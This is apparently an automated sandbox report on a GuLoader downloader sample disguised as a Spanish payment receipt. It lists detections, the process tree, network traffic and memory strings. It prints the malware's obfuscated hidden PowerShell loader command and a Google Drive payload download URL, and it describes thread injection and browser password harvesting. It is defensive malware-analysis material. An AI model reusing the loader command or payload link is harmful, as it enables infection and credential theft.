Edit tour

Windows Analysis Report
comprobante de pago.exe

Overview

General Information

Sample name:	comprobante de pago.exe
Analysis ID:	1636106
MD5:	969da5cc61a21e2d5fd00a52254ecd8e
SHA1:	3f3cb9fdf47343f8e4d88e5171ad3b57ed6c4bad
SHA256:	20dc4ffc31f978e2c822878b11a4d59c3ad6da9898a7028d75d3c9079598de18
Tags:	DarkCloudexeinfostealerSPAM-ESuser-Samples
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Writes or reads registry keys via WMI

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

comprobante de pago.exe (PID: 8040 cmdline: "C:\Users\user\Desktop\comprobante de pago.exe" MD5: 969DA5CC61A21E2D5FD00A52254ECD8E)

powershell.exe (PID: 8084 cmdline: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 1664 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3816 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1460 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1604 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3200 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 3088 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1408 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1836 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 2072 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1388 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

dxdiag.exe (PID: 1424 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 2052 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

WmiPrvSE.exe (PID: 1672 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Temp\nsx731E.tmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.1872004874.0000000008750000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000001.00000002.1865523536.0000000006437000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.1301557595.000000000279E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000001.00000002.1877174929.000000000AD60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\comprobante de pago.exe", ParentImage: C:\Users\user\Desktop\comprobante de pago.exe, ParentProcessId: 8040, ParentProcessName: comprobante de pago.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", ProcessId: 8084, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\comprobante de pago.exe", ParentImage: C:\Users\user\Desktop\comprobante de pago.exe, ParentProcessId: 8040, ParentProcessName: comprobante de pago.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)", ProcessId: 8084, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T12:07:15.733632+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49714	142.250.184.238	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe	Virustotal: Detection: 20%			Perma Link

Multi AV Scanner detection for submitted file

Source: comprobante de pago.exe	Virustotal: Detection: 16%			Perma Link
Source: comprobante de pago.exe	ReversingLabs: Detection: 15%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: comprobante de pago.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: comprobante de pago.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.1867873766.00000000077DA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb)Rr source: powershell.exe, 00000001.00000002.1873084908.00000000089E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdb>Ck source: powershell.exe, 00000001.00000002.1873084908.00000000089E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbs source: powershell.exe, 00000001.00000002.1867873766.00000000077DA000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004064C1 FindFirstFileW,FindClose,	0_2_004064C1
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040596F
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49714 -> 142.250.184.238:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: comprobante de pago.exe, comprobante de pago.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1851875810.0000000005221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000001.00000002.1851875810.0000000005221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: dxdiag.exe, 00000018.00000002.2503286760.0000000007707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: dxdiag.exe, 00000018.00000002.2503286760.0000000007707000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000002.2514945447.0000000022720000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba
Source: dxdiag.exe, 00000018.00000002.2503286760.0000000007776000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000003.2030532976.0000000007776000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000002.2503286760.0000000007707000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000002.2503286760.000000000775D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1pq91eKOJBurJmAFIWNDkdypFM6eTlJba&export=download
Source: dxdiag.exe, 00000018.00000002.2503286760.0000000007776000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000003.2030532976.0000000007776000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/uj3x
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000001.00000002.1851875810.0000000005377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1865523536.000000000628B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: dxdiag.exe, 00000018.00000003.2445903469.00000000077DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: dxdiag.exe, 00000018.00000003.1974382176.00000000077B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040541C

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

Jump to dropped file

Writes or reads registry keys via WMI

Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004033B6

Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_00406846		0_2_00406846
Source: C:\Users\user\Desktop\comprobante de pago.exe	Code function: 0_2_00404C59		0_2_00404C59

Source: comprobante de pago.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@31/32@2/2

Source: C:\Users\user\Desktop\comprobante de pago.exe

0_2_004033B6

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046DD

Source: C:\Users\user\Desktop\comprobante de pago.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03

Source: C:\Users\user\Desktop\comprobante de pago.exe

File created: C:\Users\user\AppData\Local\Temp\nsx731D.tmp

Jump to behavior

Source: comprobante de pago.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\comprobante de pago.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dxdiag.exe, 00000018.00000003.2447680314.00000000077EB000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000018.00000003.2448541231.00000000077EA000.00000004.00000020.00020000.00000000.sdmp, LoggambirseaXxYCfnDSXQhemadynamic.24.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: comprobante de pago.exe	Virustotal: Detection: 16%
Source: comprobante de pago.exe	ReversingLabs: Detection: 15%

Source: C:\Users\user\Desktop\comprobante de pago.exe

File read: C:\Users\user\Desktop\comprobante de pago.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\comprobante de pago.exe "C:\Users\user\Desktop\comprobante de pago.exe"
Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
